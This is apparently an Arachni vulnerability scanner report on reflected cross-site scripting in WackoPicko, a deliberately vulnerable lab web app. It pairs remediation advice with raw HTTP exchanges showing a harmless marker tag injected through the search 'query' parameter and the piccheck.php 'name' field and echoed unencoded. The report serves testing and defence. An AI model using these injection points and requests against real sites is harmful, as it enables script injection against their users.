Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Cross-Site Scripting (XSS) 7 xss

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to insert script content directly into HTML element content.

Remediation guidance

To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.

Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.

Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:

  • &
  • <
  • >
  • "
  • '
  • /

An example of HTML entity encoding is converting < to &lt;.

Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:

  1. Directly in a script.
  2. Inside an HTML comment.
  3. In an attribute name.
  4. In a tag name.
  5. Directly in CSS.

Each of these locations have their own form of escaping and filtering.

Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.

Injected seed Proof
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
0
1
2
3
4
5
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
  <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
  </input>
  <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/pictures/search.php
query
query
1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/pictures/search.php?query=1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:54 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 942
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="1&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;"/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'</h2>

   <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
      <h3 class="error">No pictures here...</h3>


</ul>
</div>

</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>
    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST">
  <input type="hidden" name="MAX_FILE_SIZE" value="30000">
  </input>
  Check this file:
  <input name="userfile" type="file">
  </input>
  <br>
  </br>
  With this name:
  <input name="name" type="text">
  </input>
  <br>
  </br>
  <br>
  </br>
  <input type="submit" value="Send File">
  </input>
  <br>
  </br>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/piccheck.php
MAX_FILE_SIZE
30000
userfile
name
MAX_FILE_SIZE
30000
userfile
arachni_user
name
arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/piccheck.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Content-Length: 104
Content-Type: application/x-www-form-urlencoded

MAX_FILE_SIZE=30000&userfile=arachni_user&name=arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 907
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Checking your file arachni_name<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></h2>
  <p>
    File is O.K. to upload!
  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 3.950414 load page
URL http://192.168.0.26/WackoPicko/
1 2.996451 request http://192.168.0.26/WackoPicko/
2 0.337047 request http://192.168.0.26/WackoPicko/css/stylings.php

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Accept-Language: en-CA,*

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br>
    But that's not all, you can also buy the rights to the high quality <br>
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  <p></p>
  <p>
    </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  <p></p>
  <p>
    </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br>
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  <p></p>
</div>


       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
